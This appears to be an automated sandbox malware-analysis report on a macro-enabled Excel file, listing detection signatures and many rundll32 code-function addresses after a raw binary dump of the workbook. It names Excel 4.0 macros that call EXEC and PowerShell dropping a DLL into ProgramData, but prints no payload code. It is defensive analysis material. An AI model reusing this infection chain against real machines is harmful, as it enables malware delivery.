                            Source: NZW-010122 BNUV-280122.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: NZW-010122 BNUV-280122.xlsmInitial sample: EXEC
                            Source: NZW-010122 BNUV-280122.xlsmInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DF8FD9_2_002DF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DE9919_2_002DE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DAB879_2_002DAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E00019_2_002E0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D90119_2_002D9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E907F9_2_002E907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002F00569_2_002F0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D20519_2_002D2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E20BA9_2_002E20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D70B39_2_002D70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DF09B9_2_002DF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E41169_2_002E4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D51BB9_2_002D51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D81B79_2_002D81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D22519_2_002D2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EA2E89_2_002EA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DE2CC9_2_002DE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DB2C79_2_002DB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D53619_2_002D5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D43469_2_002D4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002F13AD9_2_002F13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EC3A09_2_002EC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002ED3899_2_002ED389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EE3959_2_002EE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EF4359_2_002EF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E044F9_2_002E044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D64E29_2_002D64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E85199_2_002E8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D55489_2_002D5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DA55F9_2_002DA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E25509_2_002E2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E95FA9_2_002E95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DE5CF9_2_002DE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EC6319_2_002EC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E86069_2_002E8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EA6669_2_002EA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E66CA9_2_002E66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DD6D89_2_002DD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E473C9_2_002E473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D77359_2_002D7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D97149_2_002D9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E176B9_2_002E176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DB74D9_2_002DB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D48169_2_002D4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E18899_2_002E1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D89699_2_002D8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E894B9_2_002E894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002F09B59_2_002F09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D59F29_2_002D59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EAA309_2_002EAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D1A569_2_002D1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DEA999_2_002DEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EBB239_2_002EBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D8B3D9_2_002D8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E0B199_2_002E0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DBB7E9_2_002DBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002ECB5B9_2_002ECB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E7BA69_2_002E7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E4B879_2_002E4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D9B839_2_002D9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EDBEA9_2_002EDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E8BE39_2_002E8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E9BCF9_2_002E9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D2BD99_2_002D2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D3C3C9_2_002D3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EAC3A9_2_002EAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D7C379_2_002D7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002F0C149_2_002F0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E6C499_2_002E6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D4C5D9_2_002D4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EDCF79_2_002EDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E5CC49_2_002E5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D6D249_2_002D6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E6DF89_2_002E6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D9DCF9_2_002D9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E7DD59_2_002E7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EBE279_2_002EBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D3E3F9_2_002D3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002F0E3A9_2_002F0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EAE6D9_2_002EAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D5E609_2_002D5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E0E539_2_002E0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DEE819_2_002DEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E9EEC9_2_002E9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D4EE39_2_002D4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DAEFB9_2_002DAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002EDEDC9_2_002EDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002F0F339_2_002F0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DCF479_2_002DCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DDFF39_2_002DDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D7FF29_2_002D7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00303C3C10_2_00303C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030901110_2_00309011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031044F10_2_0031044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003120BA10_2_003120BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030F8FD10_2_0030F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030D6D810_2_0030D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031411610_2_00314116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003213AD10_2_003213AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030AB8710_2_0030AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00307FF210_2_00307FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003059F210_2_003059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003195FA10_2_003195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031C63110_2_0031C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031AA3010_2_0031AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031F43510_2_0031F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00307C3710_2_00307C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00320E3A10_2_00320E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031AC3A10_2_0031AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00303E3F10_2_00303E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031BE2710_2_0031BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030481610_2_00304816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00320C1410_2_00320C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031000110_2_00310001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031860610_2_00318606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031907F10_2_0031907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00305E6010_2_00305E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031A66610_2_0031A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031AE6D10_2_0031AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030205110_2_00302051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030225110_2_00302251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00310E5310_2_00310E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0032005610_2_00320056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00301A5610_2_00301A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00304C5D10_2_00304C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00316C4910_2_00316C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003070B310_2_003070B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030EA9910_2_0030EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030F09B10_2_0030F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030EE8110_2_0030EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031188910_2_00311889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031DCF710_2_0031DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030AEFB10_2_0030AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003064E210_2_003064E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00304EE310_2_00304EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031A2E810_2_0031A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00319EEC10_2_00319EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031DEDC10_2_0031DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00315CC410_2_00315CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030B2C710_2_0030B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003166CA10_2_003166CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030E2CC10_2_0030E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00320F3310_2_00320F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030773510_2_00307735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031473C10_2_0031473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00308B3D10_2_00308B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031BB2310_2_0031BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00306D2410_2_00306D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030971410_2_00309714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031851910_2_00318519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00310B1910_2_00310B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030BB7E10_2_0030BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030536110_2_00305361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030896910_2_00308969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031176B10_2_0031176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031255010_2_00312550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031CB5B10_2_0031CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030A55F10_2_0030A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030434610_2_00304346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030CF4710_2_0030CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030554810_2_00305548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031894B10_2_0031894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030B74D10_2_0030B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003209B510_2_003209B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003081B710_2_003081B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003051BB10_2_003051BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031C3A010_2_0031C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00317BA610_2_00317BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030E99110_2_0030E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031E39510_2_0031E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00309B8310_2_00309B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00314B8710_2_00314B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031D38910_2_0031D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030DFF310_2_0030DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00316DF810_2_00316DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00318BE310_2_00318BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0031DBEA10_2_0031DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00317DD510_2_00317DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00302BD910_2_00302BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00319BCF10_2_00319BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00309DCF10_2_00309DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0030E5CF10_2_0030E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077F8FD11_2_0077F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077E99111_2_0077E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077AB8711_2_0077AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078907F11_2_0078907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077205111_2_00772051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0079005611_2_00790056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077901111_2_00779011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078000111_2_00780001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007820BA11_2_007820BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007770B311_2_007770B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077F09B11_2_0077F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078411611_2_00784116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007781B711_2_007781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007751BB11_2_007751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077225111_2_00772251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078A2E811_2_0078A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077B2C711_2_0077B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077E2CC11_2_0077E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077536111_2_00775361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077434611_2_00774346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007913AD11_2_007913AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078C3A011_2_0078C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078E39511_2_0078E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078D38911_2_0078D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078044F11_2_0078044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078F43511_2_0078F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007764E211_2_007764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077A55F11_2_0077A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078255011_2_00782550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077554811_2_00775548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078851911_2_00788519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007895FA11_2_007895FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077E5CF11_2_0077E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078A66611_2_0078A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078C63111_2_0078C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078860611_2_00788606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077D6D811_2_0077D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007866CA11_2_007866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078176B11_2_0078176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077B74D11_2_0077B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077773511_2_00777735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078473C11_2_0078473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077971411_2_00779714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077481611_2_00774816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078188911_2_00781889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077896911_2_00778969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078894B11_2_0078894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007759F211_2_007759F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_007909B511_2_007909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00771A5611_2_00771A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078AA3011_2_0078AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077EA9911_2_0077EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077BB7E11_2_0077BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078CB5B11_2_0078CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00778B3D11_2_00778B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078BB2311_2_0078BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00780B1911_2_00780B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078DBEA11_2_0078DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00788BE311_2_00788BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00772BD911_2_00772BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00789BCF11_2_00789BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00787BA611_2_00787BA6
